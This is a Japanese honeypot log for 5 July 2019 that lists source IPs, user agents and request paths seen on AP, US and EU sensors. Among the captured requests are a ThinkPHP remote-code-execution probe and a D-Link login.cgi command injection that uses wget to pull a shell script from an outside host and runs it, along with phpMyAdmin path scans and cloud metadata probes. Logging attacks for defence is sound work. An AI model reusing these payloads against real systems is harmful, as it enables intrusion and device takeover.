ハニーポット(仮) 観測記録 2019/07/05分です。
APでは
ThinkPHPの脆弱性狙いのアクセス
を確認しました。
USでは
phpMyAdminに関するスキャン行為と
D-linkの脆弱性を狙うリクエスト
を確認しました。
Taiwan、Hong Kong、United Statesからのアクセスがちょうど108でした。
EUでは
アクセス数が減少し、おとなしい状況でした。
アクセス数推移
AP:総アクセス数:97 (前日比:+63)
US:総アクセス数:329 (前日比:+309)
EU:総アクセス数:4 (前日比:-111)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 100.114.72.70 | United States |
4 | 106.51.77.6 | India |
4 | 113.106.211.110 | China |
3 | 129.28.55.120 | China |
1 | 1.34.188.214 | Taiwan |
1 | 157.55.39.49 | United States |
2 | 176.58.124.134 | United Kingdom |
2 | 198.167.223.52 | St Kitts and Nevis |
1 | 46.246.44.177 | Sweden |
1 | 52.142.196.101 | Netherlands |
1 | 54.215.138.17 | United States |
1 | 61.219.11.153 | Taiwan |
64 | 62.173.140.193 | Russia |
1 | 66.249.71.122 | United States |
6 | 77.247.110.219 | Netherlands |
3 | 80.24.191.81 | Spain |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
64 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
8 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /aastra/ | HTTP/1.1 |
1 | GET | /algo/ | HTTP/1.1 |
1 | GET | /app/provision/ | HTTP/1.1 |
1 | GET | /asterisk/ | HTTP/1.1 |
1 | GET | /atacom/ | HTTP/1.1 |
1 | GET | /baFirmware/ | HTTP/1.1 |
1 | GET | /boot/ | HTTP/1.1 |
1 | GET | /bub/ | HTTP/1.1 |
1 | GET | /cfg/ | HTTP/1.1 |
1 | GET | /cisco/ | HTTP/1.1 |
1 | GET | /cnf/ | HTTP/1.1 |
2 | GET | /conf/ | HTTP/1.1 |
2 | GET | /config/ | HTTP/1.1 |
1 | GET | /configs/ | HTTP/1.1 |
1 | GET | /devicecfg/ | HTTP/1.1 |
1 | GET | /digium/ | HTTP/1.1 |
1 | GET | /fanvil/ | HTTP/1.1 |
1 | GET | /firmware | HTTP/1.1 |
1 | GET | /firmwares | HTTP/1.1 |
1 | GET | /fw/ | HTTP/1.1 |
1 | GET | /gateway | HTTP/1.1 |
1 | GET | /gateways/ | HTTP/1.1 |
1 | GET | /gigaset/ | HTTP/1.1 |
2 | GET | /.git/config | HTTP/1.1 |
1 | GET | /grandstream/ | HTTP/1.1 |
1 | GET | /gs/ | HTTP/1.1 |
1 | GET | /gswave/ | HTTP/1.1 |
1 | GET | /htek/ | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /latest/meta-data | HTTP/1.1 |
1 | GET | /linksys/ | HTTP/1.1 |
1 | GET | /Login.htm | HTTP/1.1 |
4 | GET | /manager/html | HTTP/1.1 |
1 | GET | /MikroTik/ | HTTP/1.1 |
1 | GET | /mitel/ | HTTP/1.1 |
1 | GET | /obihai/ | HTTP/1.1 |
1 | GET | /overides/ | HTTP/1.1 |
2 | GET | /panasonic/ | HTTP/1.1 |
1 | GET | /patton/ | HTTP/1.1 |
1 | GET | /phone-devices/ | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /prov/ | HTTP/1.1 |
1 | GET | /provisioner/ | HTTP/1.1 |
1 | GET | /provision/ | HTTP/1.1 |
1 | GET | /provisioning/ | HTTP/1.1 |
2 | GET | /QUERY/en-us/msdn/ | HTTP/1.1 |
1 | GET | /reg | HTTP/1.1 |
2 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sangoma/ | HTTP/1.1 |
1 | GET | /Sep/ | HTTP/1.1 |
1 | GET | /SEP/ | HTTP/1.1 |
1 | GET | /sip.conf/ | HTTP/1.1 |
1 | GET | /sip.config/ | HTTP/1.1 |
1 | GET | /sip/ | HTTP/1.1 |
1 | GET | /sipphone/ | HTTP/1.1 |
1 | GET | /smart/ | HTTP/1.1 |
1 | GET | /smarty/ | HTTP/1.1 |
2 | GET | /snom/ | HTTP/1.1 |
1 | GET | /spa/ | HTTP/1.1 |
1 | GET | /spectralink/ | HTTP/1.1 |
1 | GET | /sys/ | HTTP/1.1 |
1 | GET | /temp | HTTP/1.1 |
1 | GET | /tftpboot/ | HTTP/1.1 |
1 | GET | /tftp/ | HTTP/1.1 |
3 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /voice/ | HTTP/1.1 |
1 | GET | /voip/ | HTTP/1.1 |
1 | GET | /vpn/ | HTTP/1.1 |
1 | GET | /xml/ | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
4 | HEAD | /robots.txt | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.1 |
3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
108 | 114.32.218.228 | Taiwan |
1 | 118.24.163.20 | China |
1 | 198.167.223.52 | St Kitts and Nevis |
108 | 202.131.65.218 | Hong Kong |
1 | 35.163.67.143 | United States |
108 | 73.253.72.93 | United States |
2 | 77.247.110.219 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Hakai/2.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
324 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/db/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /administrator/admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /administrator/db/index.php?lang=en | HTTP/1.1 |
3 | GET | /administrator/phpmyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /administrator/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /administrator/pma/index.php?lang=en | HTTP/1.1 |
3 | GET | /administrator/PMA/index.php?lang=en | HTTP/1.1 |
3 | GET | /administrator/web/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/phpmyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/pMA/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/sqladmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/sysadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /admin/web/index.php?lang=en | HTTP/1.1 |
3 | GET | /database/index.php?lang=en | HTTP/1.1 |
3 | GET | /dbadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/db-admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/dbadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/dbweb/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/myadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/phpmyadmin3/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/phpMyAdmin-3/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/phpMyAdmin3/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/phpmyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/webadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/webdb/index.php?lang=en | HTTP/1.1 |
3 | GET | /db/websql/index.php?lang=en | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
3 | GET | /index.php?lang=en | HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://194[.]147[.]32[.]131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
3 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /MyAdmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql-admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysqladmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/db/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysqlmanager/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/pma/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/pMA/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
3 | GET | /mysql/web/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2011/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2012/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2013/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2014/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2015/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2016/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2017/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2018/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2019/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpMyAdmin2/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpMyAdmin-3/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpMyAdmin3/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpMyAdmin4/index.php?lang=en | HTTP/1.1 |
3 | GET | /php-my-admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /php-myadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmy-admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
3 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2011/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2011/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2012/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2012/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2013/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2013/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2014/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2014/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2015/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2015/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2016/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2016/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2017/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2017/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2018/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA2018/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma2019/index.php?lang=en | HTTP/1.1 |
3 | GET | /pma/index.php?lang=en | HTTP/1.1 |
3 | GET | /PMA/index.php?lang=en | HTTP/1.1 |
3 | GET | /program/index.php?lang=en | HTTP/1.1 |
3 | GET | /shopdb/index.php?lang=en | HTTP/1.1 |
3 | GET | /sqlmanager/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/myadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/phpmanager/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/phpmyadmin2/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/phpMyAdmin2/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/php-myadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/phpmy-admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/phpMyAdmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/sql-admin/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/sqladmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/sql/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/sqlweb/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/webadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/webdb/index.php?lang=en | HTTP/1.1 |
3 | GET | /sql/websql/index.php?lang=en | HTTP/1.1 |
3 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
1 | OPTIONS | / | HTTP/1.1 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 110.249.212.46 | China |
1 | 198.167.223.52 | St Kitts and Nevis |
1 | 54.183.109.102 | United States |
1 | 77.247.110.219 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | OPTIONS | / | HTTP/1.1 |